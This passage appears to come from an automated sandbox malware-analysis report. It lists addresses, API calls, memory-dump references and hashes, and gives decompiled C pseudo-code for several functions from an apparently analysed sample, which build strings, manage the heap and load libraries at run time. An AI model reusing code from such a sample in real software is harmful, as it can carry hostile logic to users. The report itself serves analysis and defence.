                                                                                                                                                                                              0x00df52b3
                                                                                                                                                                                              0x00df52bf
                                                                                                                                                                                              0x00df52c4
                                                                                                                                                                                              0x00df52cd
                                                                                                                                                                                              0x00df52de
                                                                                                                                                                                              0x00df52e2
                                                                                                                                                                                              0x00df52eb
                                                                                                                                                                                              0x00df52f1
                                                                                                                                                                                              0x00df52fe
                                                                                                                                                                                              0x00df530b
                                                                                                                                                                                              0x00df5311
                                                                                                                                                                                              0x00df531d
                                                                                                                                                                                              0x00df5323
                                                                                                                                                                                              0x00df5328
                                                                                                                                                                                              0x00df5329
                                                                                                                                                                                              0x00df5330
                                                                                                                                                                                              0x00df5335
                                                                                                                                                                                              0x00df533b
                                                                                                                                                                                              0x00df5341
                                                                                                                                                                                              0x00df5348
                                                                                                                                                                                              0x00df534f
                                                                                                                                                                                              0x00df5355
                                                                                                                                                                                              0x00df535c
                                                                                                                                                                                              0x00df5360
                                                                                                                                                                                              0x00df536b
                                                                                                                                                                                              0x00df5370
                                                                                                                                                                                              0x00df5376
                                                                                                                                                                                              0x00df537f
                                                                                                                                                                                              0x00df537f
                                                                                                                                                                                              0x00df5390
                                                                                                                                                                                              0x00df5390
                                                                                                                                                                                              0x00df539f
                                                                                                                                                                                              0x00df539f
                                                                                                                                                                                              0x00df53ae
                                                                                                                                                                                              0x00df53ae
                                                                                                                                                                                              0x00df53c0
                                                                                                                                                                                              0x00df53c0
                                                                                                                                                                                              0x00df53cf
                                                                                                                                                                                              0x00df53e0

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00DF5166
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF51B3
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF51D0
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF51F3
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 00DF5203
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF5225
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 00DF5235
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF526C
                                                                                                                                                                                              • wsprintfA.USER32 ref: 00DF528C
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00DF52A9
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00DF52B9
                                                                                                                                                                                              • RtlEnterCriticalSection.NTDLL(04C09570), ref: 00DF52CD
                                                                                                                                                                                              • RtlLeaveCriticalSection.NTDLL(04C09570), ref: 00DF52EB
                                                                                                                                                                                                • Part of subcall function 00DF4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,00DF52FE,?,04C095B0), ref: 00DF4D57
                                                                                                                                                                                                • Part of subcall function 00DF4D2C: lstrlen.KERNEL32(?,?,?,00DF52FE,?,04C095B0), ref: 00DF4D5F
                                                                                                                                                                                                • Part of subcall function 00DF4D2C: strcpy.NTDLL ref: 00DF4D76
                                                                                                                                                                                                • Part of subcall function 00DF4D2C: lstrcat.KERNEL32(00000000,?), ref: 00DF4D81
                                                                                                                                                                                                • Part of subcall function 00DF4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00DF52FE,?,04C095B0), ref: 00DF4D9E
                                                                                                                                                                                              • StrTrimA.SHLWAPI(00000000,00DFC294,?,04C095B0), ref: 00DF531D
                                                                                                                                                                                                • Part of subcall function 00DF9DEF: lstrlen.KERNEL32(?,00000000,00000000,00DF5335,616D692F,00000000), ref: 00DF9DFB
                                                                                                                                                                                                • Part of subcall function 00DF9DEF: lstrlen.KERNEL32(?), ref: 00DF9E03
                                                                                                                                                                                                • Part of subcall function 00DF9DEF: lstrcpy.KERNEL32(00000000,?), ref: 00DF9E1A
                                                                                                                                                                                                • Part of subcall function 00DF9DEF: lstrcat.KERNEL32(00000000,?), ref: 00DF9E25
                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,?), ref: 00DF5348
                                                                                                                                                                                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00DF534F
                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,?), ref: 00DF535C
                                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 00DF5360
                                                                                                                                                                                                • Part of subcall function 00DF666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 00DF6720
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 00DF5390
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 00DF539F
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?,04C095B0), ref: 00DF53AE
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000), ref: 00DF53C0
                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?), ref: 00DF53CF
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3080378247-0
                                                                                                                                                                                              • Opcode ID: 28d84341f4f7104088a028925a2edd75111b8610015adf4bdf232828e8d5d5dc
                                                                                                                                                                                              • Instruction ID: fb42f138cedb282f37a52a49a19c4814528d5ca83b92c44765644a18905bd649
                                                                                                                                                                                              • Opcode Fuzzy Hash: 28d84341f4f7104088a028925a2edd75111b8610015adf4bdf232828e8d5d5dc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 59619D31500309AFC711AB68EC48E7A77EAEB48340F068514FA08CB374DB35E916DBB9
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                              			E00DFADA5(long _a4, long _a8) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				LONG* _v28;
                                                                                                                                                                                              				long _v40;
                                                                                                                                                                                              				long _v44;
                                                                                                                                                                                              				long _v48;
                                                                                                                                                                                              				CHAR* _v52;
                                                                                                                                                                                              				long _v56;
                                                                                                                                                                                              				CHAR* _v60;
                                                                                                                                                                                              				long _v64;
                                                                                                                                                                                              				signed int* _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				signed int _t76;
                                                                                                                                                                                              				signed int _t80;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				intOrPtr* _t82;
                                                                                                                                                                                              				intOrPtr* _t83;
                                                                                                                                                                                              				intOrPtr* _t85;
                                                                                                                                                                                              				intOrPtr* _t90;
                                                                                                                                                                                              				intOrPtr* _t95;
                                                                                                                                                                                              				intOrPtr* _t98;
                                                                                                                                                                                              				void* _t102;
                                                                                                                                                                                              				intOrPtr* _t104;
                                                                                                                                                                                              				void* _t115;
                                                                                                                                                                                              				long _t116;
                                                                                                                                                                                              				void _t125;
                                                                                                                                                                                              				void* _t131;
                                                                                                                                                                                              				signed short _t133;
                                                                                                                                                                                              				struct HINSTANCE__* _t138;
                                                                                                                                                                                              				signed int* _t139;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t139 = _a4;
                                                                                                                                                                                              				_v28 = _t139[2] + 0xdf0000;
                                                                                                                                                                                              				_t115 = _t139[3] + 0xdf0000;
                                                                                                                                                                                              				_t131 = _t139[4] + 0xdf0000;
                                                                                                                                                                                              				_v8 = _t139[7];
                                                                                                                                                                                              				_v60 = _t139[1] + 0xdf0000;
                                                                                                                                                                                              				_v16 = _t139[5] + 0xdf0000;
                                                                                                                                                                                              				_v64 = _a8;
                                                                                                                                                                                              				_v72 = 0x24;
                                                                                                                                                                                              				_v68 = _t139;
                                                                                                                                                                                              				_v56 = 0;
                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                              				_v48 = 0;
                                                                                                                                                                                              				_v44 = 0;
                                                                                                                                                                                              				_v40 = 0;
                                                                                                                                                                                              				if(( *_t139 & 0x00000001) == 0) {
                                                                                                                                                                                              					_a8 =  &_v72;
                                                                                                                                                                                              					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                                                                                                                                                              					return 0;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t138 =  *_v28;
                                                                                                                                                                                              				_t76 = _a8 - _t115 >> 2 << 2;
                                                                                                                                                                                              				_t133 =  *(_t131 + _t76);
                                                                                                                                                                                              				_a4 = _t76;
                                                                                                                                                                                              				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                                                                                                                                                              				_v56 = _t80;
                                                                                                                                                                                              				_t81 = _t133 + 0xdf0002;
                                                                                                                                                                                              				if(_t80 == 0) {
                                                                                                                                                                                              					_t81 = _t133 & 0x0000ffff;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v52 = _t81;
                                                                                                                                                                                              				_t82 =  *0xdfd1a0; // 0x0
                                                                                                                                                                                              				_t116 = 0;
                                                                                                                                                                                              				if(_t82 == 0) {
                                                                                                                                                                                              					L6:
                                                                                                                                                                                              					if(_t138 != 0) {
                                                                                                                                                                                              						L18:
                                                                                                                                                                                              						_t83 =  *0xdfd1a0; // 0x0
                                                                                                                                                                                              						_v48 = _t138;
                                                                                                                                                                                              						if(_t83 != 0) {
                                                                                                                                                                                              							_t116 =  *_t83(2,  &_v72);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t116 != 0) {
                                                                                                                                                                                              							L32:
                                                                                                                                                                                              							 *_a8 = _t116;
                                                                                                                                                                                              							L33:
                                                                                                                                                                                              							_t85 =  *0xdfd1a0; // 0x0
                                                                                                                                                                                              							if(_t85 != 0) {
                                                                                                                                                                                              								_v40 = _v40 & 0x00000000;
                                                                                                                                                                                              								_v48 = _t138;
                                                                                                                                                                                              								_v44 = _t116;
                                                                                                                                                                                              								 *_t85(5,  &_v72);
                                                                                                                                                                                              							}
                                                                                                                                                                                              							return _t116;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                                                                                                                                                              								L27:
                                                                                                                                                                                              								_t116 = GetProcAddress(_t138, _v52);
                                                                                                                                                                                              								if(_t116 == 0) {
                                                                                                                                                                                              									_v40 = GetLastError();
                                                                                                                                                                                              									_t90 =  *0xdfd19c; // 0x0
                                                                                                                                                                                              									if(_t90 != 0) {
                                                                                                                                                                                              										_t116 =  *_t90(4,  &_v72);
                                                                                                                                                                                              									}
                                                                                                                                                                                              									if(_t116 == 0) {
                                                                                                                                                                                              										_a4 =  &_v72;
                                                                                                                                                                                              										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                                                                                                                                                              										_t116 = _v44;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                                                                                                                                                              								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                                                                                                                                                              									_t116 =  *(_a4 + _v16);
                                                                                                                                                                                              									if(_t116 != 0) {
                                                                                                                                                                                              										goto L32;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L27;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t98 =  *0xdfd1a0; // 0x0
                                                                                                                                                                                              					if(_t98 == 0) {
                                                                                                                                                                                              						L9:
                                                                                                                                                                                              						_t138 = LoadLibraryA(_v60);
                                                                                                                                                                                              						if(_t138 != 0) {
                                                                                                                                                                                              							L13:
                                                                                                                                                                                              							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                                                                                                                                                              								FreeLibrary(_t138);
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								if(_t139[6] != 0) {
                                                                                                                                                                                              									_t102 = LocalAlloc(0x40, 8);
                                                                                                                                                                                              									if(_t102 != 0) {
                                                                                                                                                                                              										 *(_t102 + 4) = _t139;
                                                                                                                                                                                              										_t125 =  *0xdfd198; // 0x0
                                                                                                                                                                                              										 *_t102 = _t125;
                                                                                                                                                                                              										 *0xdfd198 = _t102;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              							}
                                                                                                                                                                                              							goto L18;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v40 = GetLastError();
                                                                                                                                                                                              						_t104 =  *0xdfd19c; // 0x0
                                                                                                                                                                                              						if(_t104 == 0) {
                                                                                                                                                                                              							L12:
                                                                                                                                                                                              							_a8 =  &_v72;
                                                                                                                                                                                              							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                                                                                                                                                              							return _v44;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t138 =  *_t104(3,  &_v72);
                                                                                                                                                                                              						if(_t138 != 0) {
                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t138 =  *_t98(1,  &_v72);
                                                                                                                                                                                              					if(_t138 != 0) {
                                                                                                                                                                                              						goto L13;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t116 =  *_t82(0,  &_v72);
                                                                                                                                                                                              				if(_t116 != 0) {
                                                                                                                                                                                              					goto L33;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				goto L6;
                                                                                                                                                                                              			}

































                                                                                                                                                                                              0x00dfadb4
                                                                                                                                                                                              0x00dfadca
                                                                                                                                                                                              0x00dfadd0
                                                                                                                                                                                              0x00dfadd2
                                                                                                                                                                                              0x00dfadd7
                                                                                                                                                                                              0x00dfaddd
                                                                                                                                                                                              0x00dfade2
                                                                                                                                                                                              0x00dfade5
                                                                                                                                                                                              0x00dfadf3
                                                                                                                                                                                              0x00dfadfa
                                                                                                                                                                                              0x00dfadfd
                                                                                                                                                                                              0x00dfae00
                                                                                                                                                                                              0x00dfae01
                                                                                                                                                                                              0x00dfae04
                                                                                                                                                                                              0x00dfae07
                                                                                                                                                                                              0x00dfae0a
                                                                                                                                                                                              0x00dfae0f
                                                                                                                                                                                              0x00dfae1e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfae24
                                                                                                                                                                                              0x00dfae2e
                                                                                                                                                                                              0x00dfae38
                                                                                                                                                                                              0x00dfae3d
                                                                                                                                                                                              0x00dfae3f
                                                                                                                                                                                              0x00dfae49
                                                                                                                                                                                              0x00dfae4c
                                                                                                                                                                                              0x00dfae4f
                                                                                                                                                                                              0x00dfae55
                                                                                                                                                                                              0x00dfae57
                                                                                                                                                                                              0x00dfae57
                                                                                                                                                                                              0x00dfae5a
                                                                                                                                                                                              0x00dfae5d
                                                                                                                                                                                              0x00dfae62
                                                                                                                                                                                              0x00dfae66
                                                                                                                                                                                              0x00dfae79
                                                                                                                                                                                              0x00dfae7b
                                                                                                                                                                                              0x00dfaf23
                                                                                                                                                                                              0x00dfaf23
                                                                                                                                                                                              0x00dfaf2a
                                                                                                                                                                                              0x00dfaf2d
                                                                                                                                                                                              0x00dfaf37
                                                                                                                                                                                              0x00dfaf37
                                                                                                                                                                                              0x00dfaf3b
                                                                                                                                                                                              0x00dfafb9
                                                                                                                                                                                              0x00dfafbc
                                                                                                                                                                                              0x00dfafbe
                                                                                                                                                                                              0x00dfafbe
                                                                                                                                                                                              0x00dfafc5
                                                                                                                                                                                              0x00dfafc7
                                                                                                                                                                                              0x00dfafd1
                                                                                                                                                                                              0x00dfafd4
                                                                                                                                                                                              0x00dfafd7
                                                                                                                                                                                              0x00dfafd7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfaf3d
                                                                                                                                                                                              0x00dfaf40
                                                                                                                                                                                              0x00dfaf6e
                                                                                                                                                                                              0x00dfaf78
                                                                                                                                                                                              0x00dfaf7c
                                                                                                                                                                                              0x00dfaf84
                                                                                                                                                                                              0x00dfaf87
                                                                                                                                                                                              0x00dfaf8e
                                                                                                                                                                                              0x00dfaf98
                                                                                                                                                                                              0x00dfaf98
                                                                                                                                                                                              0x00dfaf9c
                                                                                                                                                                                              0x00dfafa1
                                                                                                                                                                                              0x00dfafb0
                                                                                                                                                                                              0x00dfafb6
                                                                                                                                                                                              0x00dfafb6
                                                                                                                                                                                              0x00dfaf9c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfaf47
                                                                                                                                                                                              0x00dfaf4a
                                                                                                                                                                                              0x00dfaf52
                                                                                                                                                                                              0x00dfaf67
                                                                                                                                                                                              0x00dfaf6c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfaf6c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfaf52
                                                                                                                                                                                              0x00dfaf40
                                                                                                                                                                                              0x00dfaf3b
                                                                                                                                                                                              0x00dfae81
                                                                                                                                                                                              0x00dfae88
                                                                                                                                                                                              0x00dfae98
                                                                                                                                                                                              0x00dfaea1
                                                                                                                                                                                              0x00dfaea5
                                                                                                                                                                                              0x00dfaee8
                                                                                                                                                                                              0x00dfaef4
                                                                                                                                                                                              0x00dfaf1d
                                                                                                                                                                                              0x00dfaef6
                                                                                                                                                                                              0x00dfaefa
                                                                                                                                                                                              0x00dfaf00
                                                                                                                                                                                              0x00dfaf08
                                                                                                                                                                                              0x00dfaf0a
                                                                                                                                                                                              0x00dfaf0d
                                                                                                                                                                                              0x00dfaf13
                                                                                                                                                                                              0x00dfaf15
                                                                                                                                                                                              0x00dfaf15
                                                                                                                                                                                              0x00dfaf08
                                                                                                                                                                                              0x00dfaefa
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfaef4
                                                                                                                                                                                              0x00dfaead
                                                                                                                                                                                              0x00dfaeb0
                                                                                                                                                                                              0x00dfaeb7
                                                                                                                                                                                              0x00dfaec7
                                                                                                                                                                                              0x00dfaeca
                                                                                                                                                                                              0x00dfaeda
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfaee0
                                                                                                                                                                                              0x00dfaec1
                                                                                                                                                                                              0x00dfaec5
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfaec5
                                                                                                                                                                                              0x00dfae92
                                                                                                                                                                                              0x00dfae96
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00dfae96
                                                                                                                                                                                              0x00dfae6f
                                                                                                                                                                                              0x00dfae73
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFAE1E
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(?), ref: 00DFAE9B
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00DFAEA7
                                                                                                                                                                                              • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 00DFAEDA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                              • String ID: $
                                                                                                                                                                                              • API String ID: 948315288-3993045852
                                                                                                                                                                                              • Opcode ID: 4a8d2b4f6e19d0d6fa8136a9e4474320514e146807de13d9e7c25b06376eda4a
                                                                                                                                                                                              • Instruction ID: 453c163166310437a4e5fc462bcad6f427ee93cbb658417610008e25a335c801
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a8d2b4f6e19d0d6fa8136a9e4474320514e146807de13d9e7c25b06376eda4a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D81F8B5A10309AFDB11CF98D984AADB7F5AF48310F19C129FA09DB350EB70E945CB61
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                                                              			E00DF30FC(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				intOrPtr _t42;
                                                                                                                                                                                              				intOrPtr _t44;
                                                                                                                                                                                              				void* _t46;
                                                                                                                                                                                              				void* _t47;
                                                                                                                                                                                              				void* _t48;
                                                                                                                                                                                              				int _t49;
                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                              				WCHAR* _t56;
                                                                                                                                                                                              				void* _t57;
                                                                                                                                                                                              				int _t58;
                                                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                                              				void* _t74;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				intOrPtr _t79;
                                                                                                                                                                                              				intOrPtr* _t85;
                                                                                                                                                                                              				intOrPtr _t88;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t74 = __ecx;
                                                                                                                                                                                              				_t79 =  *0xdfd33c; // 0x4c09bb0
                                                                                                                                                                                              				_v20 = 8;
                                                                                                                                                                                              				_v16 = GetTickCount();
                                                                                                                                                                                              				_t42 = E00DF9810(_t74,  &_v16);
                                                                                                                                                                                              				_v12 = _t42;
                                                                                                                                                                                              				if(_t42 == 0) {
                                                                                                                                                                                              					_v12 = 0xdfc19c;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t44 = E00DF47E1(_t79);
                                                                                                                                                                                              				_v8 = _t44;
                                                                                                                                                                                              				if(_t44 != 0) {
                                                                                                                                                                                              					_t85 = __imp__;
                                                                                                                                                                                              					_t46 =  *_t85(_v12, _t69);
                                                                                                                                                                                              					_t47 =  *_t85(_v8);
                                                                                                                                                                                              					_t48 =  *_t85(_a4);
                                                                                                                                                                                              					_t49 = lstrlenW(_a8);
                                                                                                                                                                                              					_t53 = E00DF58BE(lstrlenW(0xdfeb38) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0xdfeb38) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
                                                                                                                                                                                              					_v16 = _t53;
                                                                                                                                                                                              					if(_t53 != 0) {
                                                                                                                                                                                              						_t75 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              						_t73 =  *0xdfd11c; // 0xdfabc9
                                                                                                                                                                                              						_t18 = _t75 + 0xdfeb38; // 0x530025
                                                                                                                                                                                              						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
                                                                                                                                                                                              						_t56 =  *_t85(_v8);
                                                                                                                                                                                              						_a8 = _t56;
                                                                                                                                                                                              						_t57 =  *_t85(_a4);
                                                                                                                                                                                              						_t58 = lstrlenW(_a12);
                                                                                                                                                                                              						_t88 = E00DF58BE(lstrlenW(0xdfec58) + _a8 + _t57 + _t58 + lstrlenW(0xdfec58) + _a8 + _t57 + _t58 + 2);
                                                                                                                                                                                              						if(_t88 == 0) {
                                                                                                                                                                                              							E00DF147E(_v16);
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t64 =  *0xdfd2a4; // 0x3e0a5a8
                                                                                                                                                                                              							_t31 = _t64 + 0xdfec58; // 0x73006d
                                                                                                                                                                                              							 *_t73(_t88, _t31, _a4, _v8, _a12);
                                                                                                                                                                                              							 *_a16 = _v16;
                                                                                                                                                                                              							_v20 = _v20 & 0x00000000;
                                                                                                                                                                                              							 *_a20 = _t88;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					E00DF147E(_v8);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _v20;
                                                                                                                                                                                              			}


























                                                                                                                                                                                              0x00df30fc
                                                                                                                                                                                              0x00df3104
                                                                                                                                                                                              0x00df310a
                                                                                                                                                                                              0x00df311a
                                                                                                                                                                                              0x00df311d
                                                                                                                                                                                              0x00df3122
                                                                                                                                                                                              0x00df3127
                                                                                                                                                                                              0x00df3129
                                                                                                                                                                                              0x00df3129
                                                                                                                                                                                              0x00df3132
                                                                                                                                                                                              0x00df3137
                                                                                                                                                                                              0x00df313c
                                                                                                                                                                                              0x00df3142
                                                                                                                                                                                              0x00df314c
                                                                                                                                                                                              0x00df3155
                                                                                                                                                                                              0x00df315c
                                                                                                                                                                                              0x00df316a
                                                                                                                                                                                              0x00df317c
                                                                                                                                                                                              0x00df3181
                                                                                                                                                                                              0x00df3186
                                                                                                                                                                                              0x00df318f
                                                                                                                                                                                              0x00df3198
                                                                                                                                                                                              0x00df31a1
                                                                                                                                                                                              0x00df31af
                                                                                                                                                                                              0x00df31b7
                                                                                                                                                                                              0x00df31bc
                                                                                                                                                                                              0x00df31bf
                                                                                                                                                                                              0x00df31ca
                                                                                                                                                                                              0x00df31e1
                                                                                                                                                                                              0x00df31e5
                                                                                                                                                                                              0x00df3218
                                                                                                                                                                                              0x00df31e7
                                                                                                                                                                                              0x00df31ea
                                                                                                                                                                                              0x00df31f2
                                                                                                                                                                                              0x00df31fd
                                                                                                                                                                                              0x00df3205
                                                                                                                                                                                              0x00df320d
                                                                                                                                                                                              0x00df3211
                                                                                                                                                                                              0x00df3211
                                                                                                                                                                                              0x00df31e5
                                                                                                                                                                                              0x00df3220
                                                                                                                                                                                              0x00df3225
                                                                                                                                                                                              0x00df322c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00DF3111
                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,80000002), ref: 00DF314C
                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00DF3155
                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 00DF315C
                                                                                                                                                                                              • lstrlenW.KERNEL32(80000002), ref: 00DF316A
                                                                                                                                                                                              • lstrlenW.KERNEL32(00DFEB38), ref: 00DF3173
                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00DF31B7
                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 00DF31BF
                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 00DF31CA
                                                                                                                                                                                              • lstrlenW.KERNEL32(00DFEC58), ref: 00DF31D3
                                                                                                                                                                                                • Part of subcall function 00DF147E: HeapFree.KERNEL32(00000000,00000000,00DF1D11,00000000,?,?,-00000008), ref: 00DF148A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000001.00000002.613522818.0000000000DF1000.00000020.00000001.sdmp, Offset: 00DF0000, based on PE: true
                                                                                                                                                                                              • Associated: 00000001.00000002.613479500.0000000000DF0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613600445.0000000000DFC000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613625403.0000000000DFD000.00000004.00000001.sdmp Download File
                                                                                                                                                                                              • Associated: 00000001.00000002.613644005.0000000000DFF000.00000002.00000001.sdmp Download File
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2535036572-0
                                                                                                                                                                                              • Opcode ID: ac9b6aa2263cb7e2299990be699404a0009013df4721c6bbe7883f18097d9e09
                                                                                                                                                                                              • Instruction ID: da37c6e472119312e7af8fec275fa37c273f9dd7f8090dbe15758ed9fd071e79
                                                                                                                                                                                              • Opcode Fuzzy Hash: ac9b6aa2263cb7e2299990be699404a0009013df4721c6bbe7883f18097d9e09
                                                                                                                                                                                              • Instruction Fuzzy Hash: CD31377690020DFFCF01AFA4DD459AEBBB6EF44344B168055EA04A7221DB35DA15DFA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00A815C2(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				signed short _v12;
                                                                                                                                                                                              				struct HINSTANCE__* _v16;
                                                                                                                                                                                              				intOrPtr _v20;
